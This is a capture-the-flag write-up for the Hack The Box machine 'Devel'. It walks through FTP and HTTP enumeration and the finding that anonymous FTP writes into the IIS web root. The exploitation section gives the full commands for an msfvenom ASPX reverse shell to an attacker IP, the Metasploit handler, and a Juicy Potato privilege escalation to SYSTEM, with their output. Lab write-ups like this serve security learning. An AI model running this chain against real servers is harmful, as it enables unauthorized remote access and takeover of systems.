Devel
About
Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
Enumeration
Running the script portscan.sh reveals 2 attack vectors, FTP and HTTP.
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ sudo portscan.sh 10.129.67.100
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ cat PortScan\(10.129.67.100\)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
HTTP
Checking the index page shows a default page for IIS 7. Other than that, there doesn’t seem to be much interesting.
FTP
Next, I’ll check if the FTP service contains any vulnerabilities. Looking at the file names from the FTP enumeration done by nmap, I realized that the root directory for the FTP might be the same as root directory for the web server. By comparing iisstart.htm from the FTP server and the web server, I’m able to find that they are the same file.
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp ftp://10.129.67.100/iisstart.htm -apV
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ diff iisstart.htm <(curl -s 'http://10.129.67.100/iisstart.htm')
Next, by uploading a file exploit.htm to the FTP server and reading the same file from the web server, I’m able to confirm two services are indeed using the same root directory. Using this knowledge, we’ll be able to upload any files, including a reverse shell payload, to the FTP server and access it via the web server.
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ echo 'w00tw00t' > exploit.htm
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp -u ftp://10.129.67.100/exploit.htm exploit.htm -apV
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ curl -s 'http://10.129.67.100/exploit.htm'
w00tw00t
Now that we’ve confirmed the vulnerability, I’ll create a reverse shell payload and upload it to the target. Since the target is hosting IIS 7, ASPX format is used for the reverse shell payload.
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx -o exploit.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2900 bytes
Saved as: exploit.aspx
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp -u ftp://10.129.67.100/exploit.aspx exploit.aspx -apV
Finally, by triggering the uploaded payload, I’m able to gain a shell as the user IIS APPPOOL\Web.
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ curl -s 'http://10.129.67.100/exploit.aspx'
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.67.100
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.67.100:49181) at 2023-09-05 09:39:15 -0400
meterpreter > getuid
Server username: IIS APPPOOL\Web
Privilege Escalation
Checking the privilege shows that the user IIS APPPOOL\Web has SeImpersonatePrivilege which allows us to use Juicy Potato to gain SYSTEM privilege.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Since we already have a meterpreter shell, I’ll use the Metasploit module exploit/windows/local/ms16_075_reflection_juicy instead to perform privilege escalation and gain a shell as the user NT AUTHORITY\SYSTEM.
meterpreter > run exploit/windows/local/ms16_075_reflection_juicy LHOST=10.10.16.9 LPORT=4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Target appears to be vulnerable (Windows 7)
[*] Launching notepad to host the exploit...
[+] Process 2008 launched.
[*] Reflectively injecting the exploit DLL into 2008...
[*] Injecting exploit into 2008...
[*] Exploit injected. Injecting exploit configuration into 2008...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.67.100
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.67.100:49199) at 2023-09-05 09:50:12 -0400
[*] Session 2 created in the background.
meterpreter > sessions 2
[*] Backgrounding session 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Users\babis\Desktop\user.txt'
0dde42c6d38fcb77056d2e62f26fa44b
meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
4b778a2dcf40fb163b8ab3ab138b577a